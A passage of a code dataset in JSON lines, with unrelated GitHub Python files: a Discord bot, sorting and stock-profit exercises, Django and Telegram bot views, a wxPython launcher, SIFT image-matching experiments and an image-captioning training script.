resp.json()\r\n embed = discord.Embed(title=\"MultiVerse Hub Response:\", description=response[\"choices\"][0][\"text\"])\r\n await interaction.response.send_message(embed=embed)\r\n\r\n@bot.tree.command()\r\nasync def weather(interaction: discord.Interaction, *, city: str):\r\n url = \"https://api.weatherapi.com/v1/current.json\"\r\n params = {\r\n \"key\": API_KEYS,\r\n \"q\": city\r\n }\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(url, params=params) as res:\r\n data = await res.json()\r\n location = data[\"location\"][\"name\"]\r\n temp_c = data[\"current\"][\"temp_c\"]\r\n temp_f = data[\"current\"][\"temp_f\"]\r\n humidity = data[\"current\"][\"humidity\"]\r\n wind_kph = data[\"current\"][\"wind_kph\"]\r\n wind_mph = data[\"current\"][\"wind_mph\"]\r\n condition = data[\"current\"][\"condition\"][\"text\"]\r\n condition_icon = data[\"current\"][\"condition\"][\"icon\"]\r\n image_url = \"https:\" + condition_icon\r\n embed = discord.Embed(title=f\"Weather For {location}\", description=f\"The condition in `{location}` is ` {condition}`\")\r\n embed.add_field(name=\"Temperature\", value=f\"c:{temp_c} | f: {temp_f}\")\r\n embed.add_field(name=\"Humidity\", value=f\"{humidity}\")\r\n embed.add_field(name=\"Wind Speeds\", value=f\"KPH: {wind_kph} | MPH: {wind_mph}\")\r\n embed.set_thumbnail(url=image_url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\nclass Dropdown(discord.ui.Select):\r\n def __init__(self, message, images, user):\r\n self.message = message\r\n self.images = images\r\n self.user = user\r\n\r\n options = [\r\n discord.SelectOption(label=\"1\"),\r\n discord.SelectOption(label=\"2\"),\r\n discord.SelectOption(label=\"3\"),\r\n discord.SelectOption(label=\"4\"),\r\n discord.SelectOption(label=\"5\"),\r\n discord.SelectOption(label=\"6\"),\r\n discord.SelectOption(label=\"7\"),\r\n discord.SelectOption(label=\"8\"),\r\n discord.SelectOption(label=\"9\"),\r\n ]\r\n\r\n super().__init__(\r\n placeholder=\"Choose the image you want to see!\",\r\n min_values=1,\r\n max_values=1,\r\n options=options,\r\n )\r\n\r\n async def callback(self, interaction: discord.Interaction):\r\n if not int(self.user) == int(interaction.user.id):\r\n await interaction.response.send_message(\"You are not the author of this message!\", ephemeral=True)\r\n return\r\n\r\n selection = int(self.values[0]) - 1\r\n image = BytesIO(base64.decodebytes(self.images[selection].encode(\"utf-8\")))\r\n embed = discord.Embed(title=\"Content Generated By Multiverse Hub\")\r\n await self.message.edit(content=None, embed=embed, file=discord.File(image, \"generatedImage.png\"), view=DropdownView(self.message, self.images, self.user))\r\n\r\n\r\nclass DropdownView(discord.ui.View):\r\n def __init__(self, message, images, user):\r\n super().__init__()\r\n self.message = message\r\n self.images = images\r\n self.user = user\r\n self.add_item(Dropdown(self.message, self.images, self.user))\r\n\r\n\r\n\r\n@bot.tree.command()\r\nasync def generate(interaction: Interaction, prompt: str):\r\n ETA = int(time.time() + 60)\r\n msg = await interaction.response.send_message(f\"Go grab a coffee, this may take some time.. ETA: \")\r\n async with aiohttp.request(\"POST\", \"https://backend.craiyon.com/generate\", json={\"Any Image Name\": prompt}) as resp:\r\n r = await resp.json()\r\n images = r['images']\r\n image = BytesIO(base64.decodebytes(images[0].encode(\"utf-8\")))\r\n embed = discord.Embed(title=\"Content Generated By Multiverse Hub\")\r\n await msg.delete()\r\n\r\n await interaction.response.send_message(content=None, embed=embed, file=discord.File(image, \"generatedImage.png\"), view=view.DropdownView(interaction, images, interaction.user.id))\r\n\r\nclass InviteButtons(discord.ui.View):\r\n def __init__(self, inv: str):\r\n super().__init__()\r\n self.inv = inv\r\n self.add_item(discord.ui.Button(label=\"Invite Link\", url=self.inv))\r\n\r\n @discord.ui.button(label=\"Invite Btn\", style=discord.ButtonStyle.blurple)\r\n async def inviteBtn(self, interaction: discord.Interaction, button: discord.ui.Button):\r\n await interaction.response.send_message(self.inv, ephemeral=True)\r\n\r\n@bot.tree.command(description=\"Creates an invite link for the current channel and displays it in a button.\")\r\nasync def invite(interaction: discord.Interaction):\r\n try:\r\n inv = await interaction.channel.create_invite()\r\n await interaction.response.send_message(\"Click the button below to invite someone!\", view=InviteButtons(str(inv)))\r\n except discord.errors.Forbidden:\r\n await interaction.response.send_message(\"I don't have permission to create an invite link. Please give me the necessary permissions.\")\r\n\r\n@bot.tree.command()\r\nasync def meme(interaction):\r\n response = requests.get('https://www.reddit.com/r/memes/random.json', headers={'User-agent': 'Mozilla/5.0'})\r\n data = response.json()[0]['data']['children'][0]['data']\r\n \r\n if not data['url'].endswith(('.jpg', '.jpeg', '.png')):\r\n await interaction.response.send_message(\"Sorry, I couldn't find any memes right now :(\")\r\n return\r\n \r\n embed = discord.Embed(title=data['title'], url=f\"https://www.reddit.com{data['permalink']}\")\r\n embed.set_image(url=data['url'])\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n\r\n@bot.tree.command()\r\nasync def generate(interaction: Interaction, prompt: str):\r\n ETA = int(time.time() + 60)\r\n msg = await interaction.response.send_message(f\"Go grab a coffee, this may take some time.. ETA: \")\r\n async with aiohttp.request(\"POST\", \"https://backend.craiyon.com/generate\", json={\"Any Image Name\": prompt}) as resp:\r\n r = await resp.json()\r\n images = r['images']\r\n image = BytesIO()\r\n\r\nbot.run(\"BOT_TOKEN\")\r\n","repo_name":"Sibbir2941/multiversehub","sub_path":"hub.py","file_name":"hub.py","file_ext":"py","file_size_in_byte":14929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29755610665","text":"from sys import stdin\n\nPoint = tuple[int, int]\nN: int = int(stdin.readline())\n\npoints: list[Point] = [tuple(map(int, stdin.readline().split())) for _ in range(N)]\n\ndef comparePoint(a: Point, b: Point) -> bool:\n ax, ay = a\n bx, by = b\n if ay < by:\n return False\n elif ay == by and ax < bx:\n return False\n return True\n\ndef merge(array: list[Point], start: int, middle: int, end: int):\n temp: list[Point] = []\n if end - start < 2: # 말단의 경우\n if comparePoint(array[start], array[end]):\n temp.append(array[end])\n temp.append(array[start])\n else:\n temp.append(array[start])\n temp.append(array[end])\n else:\n l: int = start\n r: int = middle + 1\n # 두 부분 리스트를 병합한다.\n while l <= middle and r <= end:\n if comparePoint(array[l], array[r]):\n temp.append(array[r])\n r += 1\n else:\n temp.append(array[l])\n l += 1\n # 남아있는 부분 리스트를 모두 임시 리스트에 병합한다.\n while l <= middle:\n temp.append(array[l])\n l += 1\n while r <= end:\n temp.append(array[r])\n r += 1\n for i, e in zip(range(start, end + 1), temp): # start부터 end까지의 인덱스 i와, temp 리스트의 각 요소 e로 반복한다.\n array[i] = e\n\ndef mergeSort(array: list[Point], start: int, end: int):\n if (start < end):\n middle: int = (start + end) // 2\n mergeSort(array, start, middle)\n mergeSort(array, middle + 1, end)\n merge(array, start, middle, end)\n \nmergeSort(points, 0, N - 1)\n\nfor p in points:\n print(*p)","repo_name":"Lapis0875/algorithm_datastructure","sub_path":"boj/boj11651.py","file_name":"boj11651.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18987360600","text":"def maxProfit(prices):\n if not prices or len(prices) < 2:\n return 0\n max_price, min_price, i = 0, prices[0], 1\n while i < len(prices):\n min_price = min(min_price, prices[i])\n max_price = max(max_price, prices[i]-min_price)\n i += 1\n return max_price\n\n#http://liangjiabin.com/blog/2015/04/leetcode-best-time-to-buy-and-sell-stock.html\n\nprint(maxProfit([5,4,3]))\n","repo_name":"gitttttt/lc","sub_path":"q121.py","file_name":"q121.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40582903774","text":"import click\nfrom paco.commands.helpers import paco_home_option, pass_paco_context, handle_exceptions, \\\n cloud_options, init_cloud_command, cloud_args, config_types\n\n\n@click.command(name='provision', short_help='Provision resources to the cloud.')\n@click.option(\n '-a', '--auto-publish-code',\n default=False,\n is_flag=True,\n help=\"\"\"\nAutomatically update Lambda Code assets. Lambda resources that use the `zipfile:` to a local filesystem path will automatically publish new code if it differs from the currently published code asset.\n\"\"\"\n)\n@paco_home_option\n@cloud_args\n@cloud_options\n@pass_paco_context\n@handle_exceptions\ndef provision_command(\n paco_ctx,\n verbose,\n nocache,\n yes,\n warn,\n disable_validation,\n quiet_changes_only,\n hooks_only,\n cfn_lint,\n config_scope,\n home='.',\n auto_publish_code=False,\n):\n \"\"\"Provision Cloud Resources\"\"\"\n paco_ctx.auto_publish_code = auto_publish_code\n command = 'provision'\n controller_type, obj = init_cloud_command(\n command,\n paco_ctx,\n verbose,\n nocache,\n yes,\n warn,\n disable_validation,\n quiet_changes_only,\n hooks_only,\n cfn_lint,\n config_scope,\n home\n )\n controller = paco_ctx.get_controller(controller_type, command, obj)\n controller.provision()\n\nprovision_command.help = \"\"\"\nProvision Cloud Resources.\n\n\"\"\" + config_types","repo_name":"waterbear-cloud/paco","sub_path":"src/paco/commands/cmd_provision.py","file_name":"cmd_provision.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"37"} +{"seq_id":"71899386346","text":"from django.shortcuts import render, redirect\nfrom django.http import JsonResponse, HttpResponse\nfrom django.conf import settings \nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom datetime import datetime\nimport json, os,sys\nfrom django.template import Context\nfrom . import accounts\nfrom debadmin.models import contactUs\n\ndef contact_us_add(request):\n if 'admin_session_id' not in request.session:\n return redirect(accounts.login)\n\n contact_us = contactUs.objects.all()\n context = {'contact_us':contact_us, 'contact_active':'active'}\n return render(request, 'contact/contact_us_add.html',context)\n\n\ndef contact_us_data_insertion(request):\n\tif 'admin_session_id' not in request.session:\n\t\treturn redirect(accounts.login)\n\tadmin_session_id = request.session['admin_session_id']\n \n\tupdate_contact_id = request.POST['update_contact_id']\n\taddress = request.POST['address']\n\tcontact_number = request.POST['contact_number']\n\tland_line_number = request.POST['land_line_number']\n\tmail = request.POST['email']\n\tmap_address = request.POST['map_address']\n\tfooter_content = request.POST['footer_content']\n\n\tif update_contact_id:\n\t\tcontact_data = contactUs.objects.filter(id=update_contact_id)[0]\n\t\tcontact_data.address = address\n\t\tcontact_data.contact_number = contact_number\n\t\tcontact_data.land_line_number = land_line_number\n\t\tcontact_data.mail = mail\n\t\tcontact_data.map_address = map_address\n\t\tcontact_data.footer_content = footer_content\n\t\tcontact_data.created_date = datetime.now().date()\n\t\tcontact_data.created_by = admin_session_id\n\n\t\tcontact_data.save(update_fields=['address', 'contact_number','land_line_number','mail','map_address', 'footer_content', 'created_date', 'created_by'])\n\n\telse:\n\t\tobj = contactUs(address=address, contact_number = contact_number, land_line_number = land_line_number, mail = mail, \n\t\tmap_address = map_address, footer_content = footer_content, created_date = datetime.now().date(), created_by = admin_session_id)\n\t\tobj.save()\n\n\tmessages.success(request,'ContactUs Data Updated Successfully!')\n\treturn redirect(contact_us_add)","repo_name":"abhaysantra/debscientific","sub_path":"debadmin/views/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10226506572","text":"from telegram import KeyboardButton, ReplyKeyboardMarkup, InlineKeyboardButton, InlineKeyboardMarkup\nfrom .globals import Texts\nfrom . import services\n\n\ndef go_message(context, user_id, message, reply_markup):\n context.bot.send_message(chat_id=user_id, text=message, reply_markup=reply_markup, parse_mode='HTML',\n disable_web_page_preview=True)\n\n\ndef edit_message(context, chat_id, message_id, message, reply_markup):\n try:\n context.bot.edit_message_text(chat_id=chat_id, message_id=message_id, text=message, reply_markup=reply_markup,\n parse_mode='HTML')\n except Exception as e:\n print('ERROR edit message: ', str(e))\n\n\ndef sendFilterCategories(context, chat_id, lang, message_id=None):\n inline_keyboard = []\n categories = services.getCategoryParent()\n for category in categories:\n inline_keyboard.append(\n [InlineKeyboardButton(category[f'name_{lang}'], callback_data=f'filterR_category_{category[\"id\"]}')])\n if message_id:\n edit_message(context, chat_id, message_id, Texts['TEXT_RESUME_SEND_SPECIAL'][lang], InlineKeyboardMarkup(inline_keyboard))\n else:\n go_message(context, chat_id, Texts['TEXT_RESUME_SEND_SPECIAL'][lang], InlineKeyboardMarkup(inline_keyboard))\n\n\ndef sendFilterSubCategories(context, chat_id, lang, parent_id, message_id):\n inline_keyboard = []\n categories = services.getCategoryChild(parent_id)\n cats = context.user_data['filter_data'].get('sub_cats', [])\n for category in categories:\n if category['id'] not in cats:\n inline_keyboard.append(\n [InlineKeyboardButton(category[f'name_{lang}'], callback_data=f'filterR_child_{category[\"id\"]}')])\n\n if len(inline_keyboard) > 0:\n if len(cats) > 0:\n inline_keyboard.append(\n [\n InlineKeyboardButton(Texts['BTN_SEND_BACK'][lang], callback_data=f'filterR_child_back'),\n InlineKeyboardButton(Texts['BTN_SEND_DALE'][lang], callback_data=f'filterR_child_next')\n ])\n edit_message(context, chat_id, message_id, Texts['TEXT_RESUME_SEND_CATEGORY_MORE'][lang], InlineKeyboardMarkup(inline_keyboard))\n else:\n inline_keyboard.append(\n [\n InlineKeyboardButton(Texts['BTN_SEND_BACK'][lang], callback_data=f'filterR_child_back')\n ])\n edit_message(context, chat_id, message_id, Texts['TEXT_RESUME_SEND_CATEGORY'][lang],\n InlineKeyboardMarkup(inline_keyboard))\n else:\n sendFilterGender(context, chat_id, lang, message_id)\n\n\ndef sendFilterGender(context, user_id, lang, message_id=None):\n\n if lang == 1:\n both_gender = Texts['BTN_SEND_MALE'][lang] + \" va \" + Texts['BTN_SEND_FEMALE'][lang]\n else:\n both_gender = Texts['BTN_SEND_MALE'][lang] + \" и \" + Texts['BTN_SEND_FEMALE'][lang]\n\n inline_keyboard = [\n [\n InlineKeyboardButton(Texts['BTN_SEND_MALE'][lang], callback_data='filterR_gender_man'),\n InlineKeyboardButton(Texts['BTN_SEND_FEMALE'][lang], callback_data='filterR_gender_women')\n ],\n [\n InlineKeyboardButton(both_gender, callback_data='filterR_gender_both'),\n ]\n ]\n if message_id:\n edit_message(context, user_id, message_id, Texts['TEXT_VACANCY_GENDER'][lang], InlineKeyboardMarkup(inline_keyboard))\n else:\n go_message(context, user_id, Texts['TEXT_VACANCY_GENDER'][lang], InlineKeyboardMarkup(inline_keyboard))\n\n\ndef sendFilterLanguages(context, chat_id, lang, message_id=None):\n inline_keyboard = []\n languages = services.getLanguages()\n langs = context.user_data['filter_data'].get('langs', [])\n for language in languages:\n if language['id'] not in langs:\n inline_keyboard.append(\n [InlineKeyboardButton(language[f'name_{lang}'], callback_data=f'filterR_language_{language[\"id\"]}')])\n\n if len(inline_keyboard) > 0:\n if len(langs) > 0:\n inline_keyboard.append(\n [\n InlineKeyboardButton(Texts['BTN_SEND_DALE'][lang], callback_data=f'filterR_language_next')\n ])\n if message_id:\n edit_message(context, chat_id, message_id, Texts['TEXT_SELECT_LANGUAGE'][lang], InlineKeyboardMarkup(inline_keyboard))\n else:\n go_message(context, chat_id, Texts['TEXT_SELECT_LANGUAGE'][lang], InlineKeyboardMarkup(inline_keyboard))\n else:\n if context.user_data.get('filter_state', 0) == 3:\n pass\n else:\n sendFilterExperience(context, chat_id, lang, message_id)\n\n\ndef sendFilterExperience(context, chat_id, lang, message_id=None):\n inline_keyboard = []\n experiences = services.getExperiences()\n for experience in experiences:\n\n inline_keyboard.append(\n [InlineKeyboardButton(experience[f'name_{lang}'], callback_data=f'filterR_experience_{experience[\"id\"]}')])\n if message_id:\n edit_message(context, chat_id, message_id, Texts['TEXT_SELECT_EXPERIENCE'][lang], InlineKeyboardMarkup(inline_keyboard))\n else:\n go_message(context, chat_id, Texts['TEXT_SELECT_EXPERIENCE'][lang], InlineKeyboardMarkup(inline_keyboard))\n\n\ndef sendSearchResultMenu(context, use_id, message, lang):\n buttons = [\n [KeyboardButton(text=Texts['BTN_SHOW_MORE_RESUME'][lang])],\n [KeyboardButton(text=Texts['BTN_CHANGE_REQUEST'][lang])],\n # [KeyboardButton(text=Texts['BTN_SUBSCRIBE_RESUME'][lang])],\n [KeyboardButton(text=Texts['BTN_MAIN_MENU'][lang])],\n ]\n go_message(context, use_id, message, ReplyKeyboardMarkup(buttons, one_time_keyboard=True, resize_keyboard=True))\n\ndef sendSearchEditMenu(context, use_id, message, lang):\n buttons = [\n [KeyboardButton(text=Texts['BTN_FILTER_EDIT_CATEGORY'][lang]), KeyboardButton(text=Texts['BTN_FILTER_EDIT_GENDER'][lang])],\n [KeyboardButton(text=Texts['BTN_FILTER_EDIT_LANGUAGE'][lang]), KeyboardButton(text=Texts['BTN_FILTER_EDIT_EXPERIENCE'][lang])],\n [KeyboardButton(text=Texts['BTN_SHOW_RESUMES'][lang])],\n [KeyboardButton(text=Texts['BTN_MAIN_MENU'][lang])],\n ]\n go_message(context, use_id, message, ReplyKeyboardMarkup(buttons, one_time_keyboard=True, resize_keyboard=True))","repo_name":"xudikk/telegram_bot","sub_path":"src/yesboss/tg/find_resume.py","file_name":"find_resume.py","file_ext":"py","file_size_in_byte":6334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36478039028","text":"#!/usr/bin/env python\n#---------------------------------------------------------------------------\n\nimport sys, os, glob\nimport wx\nfrom wx.tools import helpviewer\n\n\n# Figure out the path where this app is located\nif __name__ == '__main__':\n basePath = os.path.dirname(sys.argv[0])\nelse:\n basePath = os.path.dirname(__file__)\nif not basePath:\n basePath = '.'\n\n\n# test for write access\nif os.access(basePath, os.W_OK):\n\n # setup the args\n args = ['',\n '--cache='+basePath,\n os.path.join(basePath, 'wx.zip'),\n ]\n\n # add any other .zip files found\n for file in glob.glob(os.path.join(basePath, \"*.zip\")):\n if file not in args:\n args.append(file)\n\n # launch helpviewer\n helpviewer.main(args)\n\nelse:\n app = wx.App()\n dlg = wx.MessageDialog(None,\n \"The wxDocs need to be located in a directory that is writable by you. \"\n \"I am unable to start the viewer in its current location.\",\n \"Error!\", wx.OK|wx.ICON_EXCLAMATION)\n dlg.ShowModal()\n dlg.Destroy()\n app.MainLoop()\n\n#---------------------------------------------------------------------------\n\n","repo_name":"wxWidgets/wxPython-Classic","sub_path":"distrib/viewdocs.py","file_name":"viewdocs.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"37"} +{"seq_id":"43404966634","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image, ImageEnhance, ImageFilter\nfrom utils import match, gaus_noise\nimport cv2 as cv\n\nimage1 = Image.open(r\"image/image1.jpg\")\nimage1 = np.array(image1)\nimage2 = Image.open(r\"image/image2.jpg\")\n\nimage2 = np.array(image2)\nsift = cv.SIFT_create()\n# 使用SIFT查找关键点key points和描述符descriptors\nkp1, des1 = sift.detectAndCompute(image1, None)\nkp2, des2 = sift.detectAndCompute(image2, None)\nkp_image1 = cv.drawKeypoints(image1, kp1, None)\nkp_image2 = cv.drawKeypoints(image2, kp2, None)\nplt.figure(figsize=(20, 8))\nplt.subplot(121)\nplt.xticks([])\nplt.yticks([])\nplt.imshow(kp_image1)\nplt.subplot(122)\nplt.xticks([])\nplt.yticks([])\nplt.imshow(kp_image2)\nplt.savefig(r\"image/point.png\", bbox_inches='tight')\n\nplt.figure(figsize=(20, 15))\nmatcher = cv.BFMatcher()\nraw_matches = matcher.knnMatch(des1, des2, k=2)\ngood_matches = []\nfor m1, m2 in raw_matches:\n # 如果最接近和次接近的比值大于一个既定的值,那么我们保留这个最接近的值,认为它和其匹配的点为good_match\n if m1.distance < 0.85 * m2.distance:\n good_matches.append([m1])\nptsA = np.float32([kp1[m[0].queryIdx].pt for m in good_matches]).reshape(-1, 1, 2)\nptsB = np.float32([kp2[m[0].trainIdx].pt for m in good_matches]).reshape(-1, 1, 2)\nH, status = cv.findHomography(ptsA, ptsB, cv.RANSAC)\nplt.subplot(211)\nplt.title(\"Before RANSAC\", fontsize=36)\nplt.xticks([])\nplt.yticks([])\nmatches = cv.drawMatchesKnn(image1, kp1, image2, kp2, good_matches, None, flags=2)\nplt.imshow(matches)\nplt.subplot(212)\nplt.title(\"After RANSAC\", fontsize=36)\nplt.xticks([])\nplt.yticks([])\nmatches = cv.drawMatchesKnn(image1, kp1, image2, kp2, good_matches, None, matchesMask=status, flags=2)\nplt.imshow(matches)\nplt.savefig(r\"image/align.png\", bbox_inches='tight')\n\n'''\nplt.figure(figsize=(40, 15))\nenh_bri = ImageEnhance.Brightness(image2)\nenh_col = ImageEnhance.Color(image2)\nenh_con = ImageEnhance.Contrast(image2)\nplt.subplot(241)\nplt.title(\"High Brightness\", fontsize=36)\nnew_img = enh_bri.enhance(factor=1.5)\nnew_img = np.array(new_img)\nmatch(image1, new_img)\nplt.subplot(245)\nplt.title(\"Low Brightness\", fontsize=36)\nnew_img = enh_bri.enhance(factor=0.6)\nnew_img = np.array(new_img)\nmatch(image1, new_img)\nplt.subplot(242)\nplt.title(\"High Saturation\", fontsize=36)\nnew_img = enh_col.enhance(factor=1.5)\nnew_img = np.array(new_img)\nmatch(image1, new_img)\nplt.subplot(246)\nplt.title(\"Low Saturation\", fontsize=36)\nnew_img = enh_col.enhance(factor=0.6)\nnew_img = np.array(new_img)\nmatch(image1, new_img)\nplt.subplot(243)\nplt.title(\"High Contrast\", fontsize=36)\nnew_img = enh_con.enhance(factor=1.5)\nnew_img = np.array(new_img)\nmatch(image1, new_img)\nplt.subplot(247)\nplt.title(\"Low Contrast\", fontsize=36)\nnew_img = enh_con.enhance(factor=0.6)\nnew_img = np.array(new_img)\nmatch(image1, new_img)\nplt.subplot(244)\nplt.title(\"Noise\", fontsize=36)\nnew_img = np.array(image2)\nnew_img = gaus_noise(new_img, sigma=0.4)\nmatch(image1, new_img)\nplt.subplot(248)\nplt.title(\"Mask\", fontsize=36)\nnew_img = np.array(image2)\nstep = 200\nnew_img[300 - step:300 + step, 200 - step:200 + step, :] = 0\nmatch(image1, new_img)\nplt.savefig(r\"image/robust.png\", bbox_inches='tight')\n'''\n\n'''\nplt.figure(figsize=(40, 15))\nplt.subplot(241)\nplt.title(\"Blur(sigma:1)\", fontsize=36)\nnew_img = image2.filter(ImageFilter.GaussianBlur(radius=1))\nnew_img = np.array(new_img)\nplt.xticks([])\nplt.yticks([])\nplt.imshow(new_img)\nplt.subplot(245)\nmatch(image1, new_img)\nplt.subplot(242)\nplt.title(\"Blur(sigma:5)\", fontsize=36)\nnew_img = image2.filter(ImageFilter.GaussianBlur(radius=5))\nnew_img = np.array(new_img)\nplt.xticks([])\nplt.yticks([])\nplt.imshow(new_img)\nplt.subplot(246)\nmatch(image1, new_img)\nplt.subplot(243)\nplt.title(\"Shear(0.3)\", fontsize=36)\nplt.xticks([])\nplt.yticks([])\nnew_img = np.array(image2)\nM = np.array([[1, 0.3, 0], [0.3, 1, 0]])\nnew_img = cv.warpAffine(new_img, M, (int(1.5 * new_img.shape[1]), int(1.5 * new_img.shape[0])))\nplt.imshow(new_img)\nplt.subplot(247)\nmatch(image1, new_img)\nplt.subplot(244)\nplt.title(\"Shear(0.5)\", fontsize=36)\nplt.xticks([])\nplt.yticks([])\nnew_img = np.array(image2)\nM = np.array([[1, 0.5, 0], [0.5, 1, 0]])\nnew_img = cv.warpAffine(new_img, M, (int(1.5 * new_img.shape[1]), int(1.5 * new_img.shape[0])))\nplt.imshow(new_img)\nplt.subplot(248)\nmatch(image1, new_img)\nplt.savefig(r\"image/attack.png\", bbox_inches='tight')\n'''\n\n'''\nplt.figure(figsize=(40, 8))\nnew_img = np.array(image2)\nplt.subplot(141)\nplt.title(\"Regular\", fontsize=36)\nmatch(image1, new_img, method=0)\nplt.subplot(142)\nplt.title(\"RANSAC\", fontsize=36)\nmatch(image1, new_img, method=cv.RANSAC)\nplt.subplot(143)\nplt.title(\"LMEDS\", fontsize=36)\nmatch(image1, new_img, method=cv.LMEDS)\nplt.subplot(144)\nplt.title(\"PROSAC\", fontsize=36)\nmatch(image1, new_img, method=cv.RHO)\nplt.savefig(r\"image/method.png\", bbox_inches='tight')\n'''\n","repo_name":"nachewigkeit/XJTU-CV-homework","sub_path":"homework3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39388129449","text":"from .santa_fe_trail import SantaFeTrail\nfrom .cart_pole import CartPole\nfrom .mountain_car import MountainCar\nfrom typing import Iterable, Dict, Callable\nfrom task import ITask\n\n__all__ = ['get_tasks', 'get_choices', 'get_task']\n\n\ndef get_tasks() -> Dict[str, Callable[[], ITask]]:\n return {\n 'santa-fe-trail': SantaFeTrail,\n 'cart-pole': CartPole,\n 'mountain-car': MountainCar,\n }\n\n\ndef get_choices() -> Iterable[str]:\n return get_tasks().keys()\n\n\ndef get_task(task_name: str, is_player: bool = False) -> ITask:\n instance = get_tasks()[task_name]()\n instance.set_name(task_name)\n if is_player:\n instance.on_player()\n return instance\n","repo_name":"technote-space/genetic-algorithms-py","sub_path":"src/tasks/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"18440709555","text":"# This script is train for the Transformer baseline \n# refer from: https://github.com/aimagelab/meshed-memory-transformer \n\nimport random \nimport torch\nfrom torch.nn.functional import batch_norm \nfrom torch.optim import Adam \nfrom torch.optim.lr_scheduler import LambdaLR \nfrom torch.nn import NLLLoss \n\nimport argparse, os, pickle \nimport numpy as np\nfrom tqdm import tqdm \nfrom torch.utils.data import dataloader \nfrom model.transformer import Transformer \nimport multiprocessing\nimport itertools \nfrom shutil import copyfile \n\nfrom data import ImageDetectionsField, TextField, RawField\nfrom data import DataLoader, COCO \nfrom model import Transformer, VisualEncoder, CaptionDecoder, ScaledDotProductAttention\nimport evaluation \nfrom evaluation import PTBTokenizer, Cider\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\nrandom.seed(2022)\ntorch.manual_seed(2022)\nnp.random.seed(2022)\n\n\ndef train_xe(model, dataloader, optim, text_field):\n # Training with cross-entropy\n model.train()\n running_loss = .0\n with tqdm(desc='Epoch %d - train' % e, unit='it', total=len(dataloader)) as pbar:\n for it, (detections, captions) in enumerate(dataloader):\n detections, captions = detections.to(device), captions.to(device) \n out = model(detections, captions)\n optim.zero_grad()\n captions_gt = captions[:, 1:].contiguous()\n out = out[:, :-1].contiguous()\n loss = loss_fn(out.view(-1, len(text_field.vocab)), captions_gt.view(-1))\n loss.backward()\n\n optim.step()\n this_loss = loss.item()\n running_loss += this_loss\n\n pbar.set_postfix(loss=running_loss / (it + 1))\n pbar.update()\n scheduler.step() \n if it == 9:\n break \n scheduler.step() \n\n loss = running_loss / len(dataloader)\n return loss\n\n\n\ndef train_scst(model, dataloader, optim, cider, text_field):\n # Training with self-critical\n tokenizer_pool = multiprocessing.Pool()\n running_reward = .0\n running_reward_baseline = .0\n model.train()\n running_loss = .0\n seq_len = 20\n beam_size = 5\n\n with tqdm(desc='Epoch %d - train' % e, unit='it', total=len(dataloader)) as pbar:\n for it, (detections, caps_gt) in enumerate(dataloader):\n detections = detections.to(device)\n outs, log_probs = model.beam_search(detections, seq_len, text_field.vocab.stoi[''],\n beam_size, out_size=beam_size)\n optim.zero_grad()\n\n # Rewards\n caps_gen = text_field.decode(outs.view(-1, seq_len))\n caps_gt = list(itertools.chain(*([c, ] * beam_size for c in caps_gt)))\n caps_gen, caps_gt = tokenizer_pool.map(evaluation.PTBTokenizer.tokenize, [caps_gen, caps_gt])\n reward = cider.compute_score(caps_gt, caps_gen)[1].astype(np.float32)\n reward = torch.from_numpy(reward).to(device).view(detections.shape[0], beam_size)\n reward_baseline = torch.mean(reward, -1, keepdim=True)\n loss = -torch.mean(log_probs, -1) * (reward - reward_baseline)\n\n loss = loss.mean()\n loss.backward()\n optim.step()\n\n running_loss += loss.item()\n running_reward += reward.mean().item()\n running_reward_baseline += reward_baseline.mean().item()\n pbar.set_postfix(loss=running_loss / (it + 1), reward=running_reward / (it + 1),\n reward_baseline=running_reward_baseline / (it + 1))\n pbar.update() \n \n\n loss = running_loss / len(dataloader)\n reward = running_reward / len(dataloader)\n reward_baseline = running_reward_baseline / len(dataloader)\n return loss, reward, reward_baseline\n\n\n\ndef evaluate_metrics(model, dataloader, text_field):\n import itertools\n model.eval()\n gen = {}\n gts = {}\n with tqdm(desc='Epoch %d - evaluation' % e, unit='it', total=len(dataloader)) as pbar:\n for it, (images, caps_gt) in enumerate(iter(dataloader)):\n images = images.to(device)\n with torch.no_grad():\n out, _ = model.beam_search(images, 20, text_field.vocab.stoi[''], 5, out_size=1)\n caps_gen = text_field.decode(out, join_words=False)\n for i, (gts_i, gen_i) in enumerate(zip(caps_gt, caps_gen)):\n gen_i = ' '.join([k for k, g in itertools.groupby(gen_i)])\n gen['%d_%d' % (it, i)] = [gen_i, ]\n gts['%d_%d' % (it, i)] = gts_i\n pbar.update()\n if it == 9: \n break \n\n gts = evaluation.PTBTokenizer.tokenize(gts)\n gen = evaluation.PTBTokenizer.tokenize(gen)\n scores, _ = evaluation.compute_scores(gts, gen)\n return scores\n\n\nif __name__ == '__main__': \n use_device = torch.cuda.is_available()\n device = torch.device('cuda' if use_device else 'cpu') \n parser = argparse.ArgumentParser(description='Transformer Image Captioning')\n parser.add_argument('--features_path', type=str, default='COCO/features/coco_detections.hdf5')\n parser.add_argument('--annotation_folder', type=str, default='COCO/annotations') \n parser.add_argument('--workers', type=int, default=0) \n 